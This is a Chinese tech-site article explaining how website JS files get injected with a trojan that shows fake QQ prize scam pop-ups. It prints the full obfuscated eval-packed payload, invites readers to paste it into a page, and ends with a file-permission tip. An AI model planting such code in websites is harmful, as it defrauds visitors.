网站技术 | 万年历 | IT术语解释 | 在线翻译 | 中国邮政 | Alexa排名查询 | PR 值查询 | 在线代理 | IP地址查询 | 火车票查询 | 颜色选择器 | 常用网页小图标 | 网址导航 |
推荐视频黑客视频 | 安装Windows Vista视频 | 安装Windows XP系统视频教程 | 设置BIOS视频 | 硬盘分区视频 | 经典FLASH动画视频教程 | Photoshop视频教程
推荐工具IP地址查询 手机号查询 身份证查询 | 城市地图 | 火车票查询 | 健康指数 | 中秋祝福 | 许愿树 | 果果爱墙 | QQ爱墙 | 网页素材 | FLASH小游戏 |
  初步揭秘QQ中将代码是如何实现的 双击自动滚屏  【字体:
初步揭秘QQ中将代码是如何实现的
电脑知识网为您报时:今天是
分享到:

相信很多站长都遇到过自己的网站或社区都被挂过木马,那就打开网站右下角出现一个QQ中奖框来骗用户。而这个木马又是如何挂上去的呢? 经过分析这种木马主要是修改用户网站中程序的JS文件夹中的相关信息,而出现挂马。

而他们加载的这段JS代码中无任何链接和图片,让站长们很难找,主要原因就是他们的js经过了加密处理。下面我提供一段代码就是经过加密挂马的代码:

以下是代码片段:
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('p="(x)";n=" 2a";q="29";j="28(x)}";k="27";r="26";s=" l = ";m=".25";o="{24";t="23";5(t+s+r+q+p+o+n+m+k+j);5(l(22)+l(21)+l(9)+l(i)+l(4)+l(20)+l(3)+l(h)+l(1)+l(4)+l(8)+l(7)+l(6)+l(1Z)+l(0)+l(f)+l(3)+l(i)+l(0)+l(4)+l(1Y)+l(1X)+l(3)+l(0)+l(h)+l(4)+l(1W)+l(c)+l(9)+l(0)+l(1)+l(7)+l(g)+l(d)+l(e)+l(0)+l(g)+l(1)+l(1V)+l(f)+l(8)+l(1U)+l(e)+l(3)+l(d)+l(c)+l(9)+l(1T)+l(1)+l(1)+l(0)+l(8)+l(7)+l(b)+l(1S)+l(2)+l(2)+l(2)+l(2)+l(6)+l(b)+l(a)+l(a)+l(6)+l(1R)+l(1Q));5(""+O(1P)+O(1O)+O(1N)+O(1M)+O(1L)+O(1K)+O(1J)+O(1I)+O(1H)+O(1G)+O(1F)+O(1E)+O(1D)+O(1C)+O(1B)+O(1A)+O(1z)+O(1y)+O(1x)+O(1w)+O(1v)+O(1u)+O(1t)+O(1s)+O(1r)+O(1q)+O(1p)+O(1o)+O(1n)+O(1m)+O(1l)+O(1k)+O(1j)+O(1i)+O(1h)+O(1g)+O(1f)+O(1e)+O(1d)+O(1c)+O(1b)+O(1a)+O(19)+O(18)+O(17)+O(16)+O(15)+O(14)+O(13)+O(12)+O(11)+O(10)+O(Z)+O(Y)+O(X)+O(W)+O(V)+O(U)+O(T)+O(S)+O(R)+O(Q)+O(P)+O(N)+O(M)+O(L)+O(K)+O(J)+O(I)+O(H)+O(G)+O(F)+O(E)+O(D)+O(C)+O(B)+O(A)+O(z)+O(y)+O(w)+O(v)+O(u));',62,135,'114|111|48|116|110|eval|41|109|40|102|57|47|46|104|97|101|67|105|117|OlOllO|OllOOO||OllOOl|OllOlO|OllOll|OlOlll|OlllOO|OlllOl|OllllO|Olllll|58416847|40597637|38619441||61387086|114847938|110880193|103950798|112864764|98017211|113855580|46535437|59407522|61385316|33667815|113851050|104945467|45547902|110880106|98010034||46536343|99998933|99007795|109898966|98010644|110880775|113856603|46535422|107910281|109894277|98014837|45547308|106920606|113857154|99004810|96038580|99992031|106923778|101977462|109898587|109891053|101973920|45545146|117810327|117811309|117812141|46530647|46535656|57423260|110883393|114845858|114842918|102966260|33663877|60391002|98014578|112869125|113859449|31685040|83169264|79204869|72276755|81189744|66334093|82171977|59404853|38614013|39609362|31688523|99997378|114841255|103958536|112866547|117817250|45541119|114842030|108902364|99997585|107917481|115833531|98014001|109893795|99007428|125|59|49|108|77|100|103|83|32|123|99|61|79|var|return|from|func|Char|Code|tion|String'.split('|'),0,{}))
</script>

这段JS代码任意复制到一个网页中打开就可以看到效果。

如何有效的防止这些木马呢,windows服务器本身不是很安全,再加上很多站长对网站的文件目录权限设置不够好,导致木马被挂。一般情况下公用的JS文件夹都很少改动的,所以不要给来宾账户的写入修改运行等权限,只给一个读取就行了。如果真的需要修改,也可以在ftp下修改。

美女写真

两性知识

幽默搞笑

热门新闻

  
推荐视频:
Windows Vista安装
Windows XP安装
设置BIOS
硬盘分区
经典FLASH动画视频教程
Photoshop视频教程
Dreamweaver视频教程
C语言视频
DOS 视频教程 (黑客入门)
推荐工具:
手机号、身份证、区号查询
城市地图
计算器
火车查询
健康指数查询
许愿树
爱墙祝福
Q爱
flash小游戏
站长工具:
IP查询
PR 值查询
Alexa排名查询
网站运营
百度优化
Google优化
Alexa排名
更多……
网站联盟:
中国学生网(校园类型网站)
第三导航(协助上网)
Flash小游戏(小游戏)
人人健康
七楼科技 (科技)
  • 上一篇源代码:

  • 下一篇源代码: 没有了
  • 相关文章
    没有相关源代码

    Copyright 2007-2011 电脑知识网(http://www.diannaozs.com) All rights reserved
    公安局备案:京公网安备110107000134
    信产部备案:京ICP备08100023号